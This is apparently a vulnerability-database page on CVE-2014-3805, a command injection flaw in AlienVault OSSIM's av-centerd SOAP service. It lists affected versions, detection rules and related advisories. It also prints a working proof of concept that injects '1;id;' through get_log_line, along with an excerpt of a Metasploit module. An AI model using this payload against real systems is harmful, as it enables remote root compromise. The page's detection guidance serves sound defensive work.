CVE-2014-3805
published 2014-06-13CVE-2014-3805: The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2)…
PriorityP266critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
13.07%
95.9th percentile
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.
Affected
29 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alienvault | open_source_security_information_management | <= 4.6.1 | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
| alienvault | open_source_security_information_management | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandget_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')↗
- →Detect SOAP POST requests to /av-centerd on port 40007 containing the get_log_line, get_license, or update_system/upgrade_pro_web method with shell metacharacters (e.g., semicolons) in parameters, indicating command injection attempts. ↗
- →Alert on SOAP requests where the SOAPAction header contains 'AV/CC/Util#get_log_line' targeting /av-centerd over HTTPS on port 40007. ↗
- →Check for the SOAPServer response header value matching 'SOAP::Lite' on /av-centerd as a fingerprint of the vulnerable service during reconnaissance. ↗
- →Successful exploitation produces root-level command output; monitor process trees for 'tail' spawning unexpected child processes (e.g., perl, id, netcat) as children of the av-centerd daemon. ↗
- →Flag SOAP requests to /av-centerd using the get_dpkg method, which is used by the Metasploit module to fingerprint vulnerable AlienVault OSSIM versions prior to 4.7.0. ↗
- ·The vulnerability exists only in AlienVault OSSIM versions before 4.7.0; the Metasploit check returns Safe for version >= 4.7.0. ↗
- ·The av-centerd SOAP service listens on port 40007 over SSL/TLS (HTTPS); detection rules must account for encrypted traffic and may require SSL inspection or endpoint-based detection. ↗
- ·The $r_file path-traversal check (/../) and path prefix checks (/var/log/, /var/ossec/) are bypassable via shell injection within an otherwise valid path, so path-only filtering is insufficient for detection. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f68v-p32j-mqvq: The av-centerd SOAP service in AlienVault OSSIM before 4
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2014-3805 [CRITICAL] CWE-94 GHSA-f68v-p32j-mqvq: The av-centerd SOAP service in AlienVault OSSIM before 4
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.
GHSA
GHSA-3f7x-rf2q-c7q4: The av-centerd SOAP service in AlienVault OSSIM before 4
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2014-5210 [CRITICAL] CWE-94 GHSA-3f7x-rf2q-c7q4: The av-centerd SOAP service in AlienVault OSSIM before 4
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) remote_task or (2) get_license request, a different vulnerability than CVE-2014-3804 and CVE-2014-3805.
GHSA
GHSA-wmc3-5pmj-wx7f: The av-centerd SOAP service in AlienVault OSSIM before 4
ghsa_unreviewed·2022-05-17·CVSS 10.0
CVE-2014-3804 [CRITICAL] CWE-94 GHSA-wmc3-5pmj-wx7f: The av-centerd SOAP service in AlienVault OSSIM before 4
The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) update_system_info_debian_package, (2) ossec_task, (3) set_ossim_setup admin_ip, (4) sync_rserver, or (5) set_ossim_setup framework_ip request, a different vulnerability than CVE-2014-3805.
No detection rules found.
Exploit-DB
Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
exploitdb·2017-09-13
CVE-2014-3805 Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)
---
require 'msf/core'
require 'rexml/document'
class MetasploitModule 'Alienvault OSSIM av-centerd Command Injection get_log_line',
'Description' => %q{
This module exploits a command injection flaw found in the get_log_line
function found within Util.pm. The vulnerability is triggered due to an
unsanitized $r_file parameter passed to a string which is then executed
by the system
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-3805' ],
[ 'OSVDB', '107992' ]
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' =>
{
'SSL' => true,
},
'Payload' =>
{
'Compat' => {
'RequiredCmd' => 'perl netcat-e openssl python gawk'
}
},
'DefaultTarge
Exploit-DB
Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution
exploitdb·2014-06-18·CVSS 10.0
CVE-2014-3805 [CRITICAL] Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution
Alienvault Open Source SIEM (OSSIM) uri('AV/CC/Util')
-> proxy('https://172.26.22.2:40007/av-centerd')
-> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
-> result;
for (@{ $soap_response[0] }) {
print "$_\n";
}
# If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)
No writeups or analysis indexed.
http://forums.alienvault.com/discussion/2690http://zerodayinitiative.com/advisories/ZDI-14-198/http://zerodayinitiative.com/advisories/ZDI-14-199/http://zerodayinitiative.com/advisories/ZDI-14-204/https://www.exploit-db.com/exploits/42709/http://forums.alienvault.com/discussion/2690http://zerodayinitiative.com/advisories/ZDI-14-198/http://zerodayinitiative.com/advisories/ZDI-14-199/http://zerodayinitiative.com/advisories/ZDI-14-204/https://www.exploit-db.com/exploits/42709/
2014-06-13
Published